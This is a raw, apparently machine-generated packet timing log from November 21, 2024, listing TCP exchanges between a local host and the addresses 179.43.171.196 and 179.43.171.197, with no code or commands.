                                                                                                                                                              Nov 21, 2024 11:27:06.402095079 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.421148062 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.421171904 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.421298027 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.421684980 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.421777964 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.421830893 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.423147917 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.423190117 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.423242092 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.424235106 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.438715935 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.438780069 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.438872099 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.439145088 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.439201117 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.439222097 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.439822912 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.439872980 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.439933062 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.440773010 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.440830946 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.440846920 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.441719055 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.441844940 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.441894054 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.442507982 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.442548990 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.442634106 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.443392992 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.443469048 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.443521023 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.452044964 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.452105045 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.452271938 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.452477932 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.452523947 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.452528000 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.453356028 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.453406096 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.453478098 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.454195023 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.454267979 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.454489946 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.454564095 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.454617977 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.455374956 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.455473900 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.455519915 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.456501007 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.456589937 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.456639051 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.457170963 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.457374096 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.457467079 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.458112001 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.458197117 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.458244085 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.458945036 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.459084034 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.459131956 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.459831953 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.460014105 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.460058928 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.460752964 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.460819006 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.460994959 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.461610079 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.461746931 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.461791992 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.462522030 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.462624073 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.462670088 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.463375092 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.463512897 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.463593006 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.464261055 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.464451075 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.464495897 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.465193987 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.465296030 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.465344906 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.466075897 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.466195107 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.466237068 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.467046976 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.467130899 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.467202902 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.467834949 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.467899084 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.467936993 CET339349713179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.467952013 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.468746901 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.468868017 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.468918085 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.469604015 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.469667912 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.469724894 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.470531940 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.470577955 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.470638037 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.471375942 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.471507072 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.471556902 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.472280025 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.472398043 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.472485065 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.473206043 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.473489046 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.473546028 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.474054098 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.474178076 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.474226952 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.474920988 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.475984097 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.476035118 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.476106882 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.476121902 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.476171970 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.476713896 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.476841927 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.476891994 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.477601051 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.477813005 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.477863073 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.478498936 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.478652000 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.478703976 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.479449987 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.479526997 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.479578018 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.480284929 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.480350971 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.480396032 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.481162071 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.481273890 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.481322050 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.482040882 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.482151031 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.482198000 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.482990026 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.483068943 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.483185053 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.483829975 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.483927965 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.483978987 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.484724045 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.485820055 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.485865116 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.487517118 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.487535954 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.487550974 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.487561941 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.487576962 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.487586975 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.487591028 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.487607002 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.487643957 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.488517046 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.488673925 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.488816023 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.489381075 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.489393950 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.489435911 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.490060091 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.490170956 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.490219116 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.490956068 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.491071939 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.491118908 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.491827011 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.491931915 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.492247105 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.492686987 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.547840118 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.630983114 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.631062031 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.631192923 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.631553888 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.631591082 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.631644011 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.632282019 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.632551908 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.632621050 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.632802010 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.633646011 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.633660078 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.633713961 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.634309053 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.634365082 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.634435892 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.634967089 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.635020018 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.635062933 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.635811090 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.635891914 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.644184113 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.644201040 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.644330978 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.644387960 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.644501925 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.644562006 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.645575047 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.645596027 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.645667076 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.646119118 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.646361113 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.646408081 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.646440983 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.647351027 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.647363901 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.647397995 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.649174929 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.649194956 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.649240971 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.649420977 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.649434090 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.649477005 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.650037050 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.650057077 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.650089025 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.650648117 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.650700092 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.650765896 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.651535034 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.651634932 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.651639938 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.652389050 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.652434111 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.652461052 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.653599977 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.653621912 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.653666973 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.654330969 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.654342890 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.654383898 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.655117035 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.655133009 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.655180931 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.655803919 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.655848980 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.655926943 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.656730890 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.656780958 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.656791925 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.658103943 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.658111095 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.658162117 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.658746004 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.658760071 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.658791065 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.659614086 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.659626961 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.659688950 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.660231113 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.660278082 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.660334110 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.661199093 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.661211967 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.661261082 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.661820889 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.661865950 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.661900043 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.663069963 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.663089037 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.663125038 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.663852930 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.663865089 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.663902998 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.664674997 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.664689064 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.664726019 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.665276051 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.665328979 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.665352106 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.666546106 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.666558027 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.666716099 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.666975021 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.667033911 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.667534113 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.667975903 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.667987108 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.668024063 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.668682098 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.668730974 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.668817043 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.670655012 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.670667887 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.670722008 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.670833111 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.670878887 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.671216965 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.671255112 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.671300888 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.671415091 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.672415972 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.672430992 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.672470093 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.672996998 CET598249718179.43.171.196192.168.2.9
